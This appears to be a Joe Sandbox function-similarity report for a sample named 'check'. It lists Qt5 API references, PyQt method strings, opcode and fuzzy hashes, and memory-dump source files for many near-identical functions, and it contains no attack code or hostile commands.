Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QRasterWindow$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
API String ID: 59943102-1130590007
Opcode ID: a959b44622f8ac3e8bf9c290313c7000fa815441be15034309e1779f362c16ec
Instruction ID: 2a643d49b69ac68b1f82454fb2034b72fd877cfe029a385d13034684dfe02fc9
Opcode Fuzzy Hash: a959b44622f8ac3e8bf9c290313c7000fa815441be15034309e1779f362c16ec
Instruction Fuzzy Hash: 2F212E3170DB4686EA008B25E8546BA77A4FB94B94F580172DA8D47768EF3CE855C700

Function 00007FFD86262CB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFD86262D4B

Strings

BJ8, xrefs: 00007FFD86262D00
showEvent, xrefs: 00007FFD86262D86
QWindow, xrefs: 00007FFD86262D8D
showEvent(self, a0: Optional[QShowEvent]), xrefs: 00007FFD86262D7A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QWindow$showEvent$showEvent(self, a0: Optional[QShowEvent])
API String ID: 2314446140-920456979
Opcode ID: 3c61de531afaee7f290f9041554c5abe7c35a91e045c81b268f42e94ade1cb52
Instruction ID: f4cb81b8cbb678215c639efb84214f76acf42e17b26ccc16c7e77407ccd4eaf3
Opcode Fuzzy Hash: 3c61de531afaee7f290f9041554c5abe7c35a91e045c81b268f42e94ade1cb52
Instruction Fuzzy Hash: 4921107270DB4686EB409B15E8552AA77B4FB84BA4F144172DA8D43774EF3CD845C740

Function 00007FFD8624ACA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD8624AD3B

Strings

BJ9, xrefs: 00007FFD8624ACF0
QWindow, xrefs: 00007FFD8624AD7A
disconnectNotify, xrefs: 00007FFD8624AD73
disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD8624AD67

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QWindow$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-830671101
Opcode ID: 615e5d4c912bafab9c6d019f1cf19324b6b31f0487e3ae6bfc42fd3edd586ad8
Instruction ID: 84e1df71ae6a3667b6f9b8ea42cd808ccc2ab583db459f24ecb9ff584cc2aafd
Opcode Fuzzy Hash: 615e5d4c912bafab9c6d019f1cf19324b6b31f0487e3ae6bfc42fd3edd586ad8
Instruction Fuzzy Hash: 2C211D32B0CB4AC6EB409B15E8546AA77A4FB85BA4F180172DA8D43778EF3CE845C700

Function 00007FFD862B0CE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862B0D7B

Strings

customEvent, xrefs: 00007FFD862B0DB3
BJ8, xrefs: 00007FFD862B0D30
QDoubleValidator, xrefs: 00007FFD862B0DBA
customEvent(self, a0: Optional[QEvent]), xrefs: 00007FFD862B0DA7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QDoubleValidator$customEvent$customEvent(self, a0: Optional[QEvent])
API String ID: 59943102-1569424415
Opcode ID: f250b4546b23fd4a19ce7ba69e9d706c14b02a5b7396c0d848a7abe82227527f
Instruction ID: b7f5388cdaaa836ade50ec85e4909e02f25bb778f37e99407321921512e374da
Opcode Fuzzy Hash: f250b4546b23fd4a19ce7ba69e9d706c14b02a5b7396c0d848a7abe82227527f
Instruction Fuzzy Hash: A5212E31B0CB46C6EA409B15F4642AA77B4FB84BA4F580172DA8D03764EF3CE845C700

Function 00007FFD8629ECE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFD8629ED7B

Strings

QRasterWindow, xrefs: 00007FFD8629EDBD
BJ8, xrefs: 00007FFD8629ED30
mouseMoveEvent, xrefs: 00007FFD8629EDB6
mouseMoveEvent(self, a0: Optional[QMouseEvent]), xrefs: 00007FFD8629EDAA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?tabletEvent@Event@@@TabletWindow@@
String ID: BJ8$QRasterWindow$mouseMoveEvent$mouseMoveEvent(self, a0: Optional[QMouseEvent])
API String ID: 2314446140-1750509042
Opcode ID: f32341fdea84228f413c0757ff975717e008785ab8fe3e994690e3a180ee9cb4
Instruction ID: 160bdca43c76373b062dad7ec6b518e2e51d171d16e680f5dff6d8b2ae7f3392
Opcode Fuzzy Hash: f32341fdea84228f413c0757ff975717e008785ab8fe3e994690e3a180ee9cb4
Instruction Fuzzy Hash: 6221FD71B0CB4686EA409B15F8546BA77A4FF84B94F144172DA8D03B78EF3CD955C700

Function 00007FFD8622CD20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?blockInserted@QTextBlockGroup@@MEAAXAEBVQTextBlock@@@Z.QT5GUI ref: 00007FFD8622CDBB

Strings

blockInserted(self, block: QTextBlock), xrefs: 00007FFD8622CDE7
blockInserted, xrefs: 00007FFD8622CDF3
BJ9, xrefs: 00007FFD8622CD70
QTextBlockGroup, xrefs: 00007FFD8622CDFA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?blockBlockBlock@@@Group@@Inserted@
String ID: BJ9$QTextBlockGroup$blockInserted$blockInserted(self, block: QTextBlock)
API String ID: 2556882614-2491428227
Opcode ID: 4b278316ff5f415f6aa75a69ed018701f63d41ed03f169edd4e389a4eb8933c9
Instruction ID: 81119211c2de178fca46b2841b481667a6bb2f970cd345224a658b0a0db62c21
Opcode Fuzzy Hash: 4b278316ff5f415f6aa75a69ed018701f63d41ed03f169edd4e389a4eb8933c9
Instruction Fuzzy Hash: 1E210E3274CB4686EB409F15E8542AAB7B4FB84BA4F580172DA8D43774EF3CE945C740

Function 00007FFD862AADD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862AAE6B

Strings

disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD862AAE97
BJ9, xrefs: 00007FFD862AAE20
disconnectNotify, xrefs: 00007FFD862AAEA3
QTextObject, xrefs: 00007FFD862AAEAA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QTextObject$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-1354844979
Opcode ID: bfb84ce2f73098f07056ee6a540a3d7e721b8f5f8535b3d231a6304b56e22d58
Instruction ID: 4e9414354d1031e82465cad786c0685fff296bd072f592abfa77814ac37879bc
Opcode Fuzzy Hash: bfb84ce2f73098f07056ee6a540a3d7e721b8f5f8535b3d231a6304b56e22d58
Instruction Fuzzy Hash: 17212B32B0CB46D6EA408B15E9542AA73A4FF84BE5F580172EA8D43764EF3CE845C740

Function 00007FFD8625CDC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD8625CE5B

Strings

BJ9, xrefs: 00007FFD8625CE10
QTextTable, xrefs: 00007FFD8625CE9A
disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD8625CE87
disconnectNotify, xrefs: 00007FFD8625CE93

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QTextTable$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-2040343871
Opcode ID: 3ed37db56995856225951c0671f20c6e9f3dc65765e4cf7039ae8455c2f82c2d
Instruction ID: 54e82bf252bfaf0a26f5e9d782424dad77c1bef6336ae0c1bdd70c024276f0e8
Opcode Fuzzy Hash: 3ed37db56995856225951c0671f20c6e9f3dc65765e4cf7039ae8455c2f82c2d
Instruction Fuzzy Hash: 42210E3270DB46C2EA509B15F8982AE77A4FB84BA4F140176DA8D43764FF3CE845C740

Function 00007FFD8622E200 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD8622E29B

Strings

BJ9, xrefs: 00007FFD8622E250
connectNotify, xrefs: 00007FFD8622E2D3
QStandardItemModel, xrefs: 00007FFD8622E2DA
connectNotify(self, signal: QMetaMethod), xrefs: 00007FFD8622E2C7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QStandardItemModel$connectNotify$connectNotify(self, signal: QMetaMethod)
API String ID: 59943102-2748816429
Opcode ID: c3097d1153d5c5077a6f3eace9c6b29d0603c8e9d43cbb01af184526b92b748f
Instruction ID: 66decdbbd95e30f25b39229949822ce9c968161dbf66f9efc5ce045684740592
Opcode Fuzzy Hash: c3097d1153d5c5077a6f3eace9c6b29d0603c8e9d43cbb01af184526b92b748f
Instruction Fuzzy Hash: C3211072B0CB4686EA009F55F8542AAB7B4FB84BA4F540172DA8E47B74EF3CE845D700

Function 00007FFD862A0200 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD862A029B

Strings

BJ9, xrefs: 00007FFD862A0250
disconnectNotify(self, signal: QMetaMethod), xrefs: 00007FFD862A02C7
disconnectNotify, xrefs: 00007FFD862A02D3
QTextFrame, xrefs: 00007FFD862A02DA

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ9$QTextFrame$disconnectNotify$disconnectNotify(self, signal: QMetaMethod)
API String ID: 59943102-2360892179
Opcode ID: 5da943aaf597b13887bc197e6f47711f807281498795ce8cfa10451729416098
Instruction ID: 56e90ed0f3df13121d658c68233b6c25104e91f08cecc82953977346a85f4527
Opcode Fuzzy Hash: 5da943aaf597b13887bc197e6f47711f807281498795ce8cfa10451729416098
Instruction Fuzzy Hash: 40212D32B0CB4696EB008F15E8942AA73A4FB84BA5F540172EA8D43B64EF3CD845C700

Function 00007FFD8622ADF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFD8622AE8B

Strings

BJ9, xrefs: 00007FFD8622AE40
QTextBlockGroup, xrefs: 00007FFD8622AECA
connectNotify(self, signal: QMetaMethod), xrefs: 00007FFD8622AEB7
connectNotify, xrefs: 00007FFD8622AEC3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
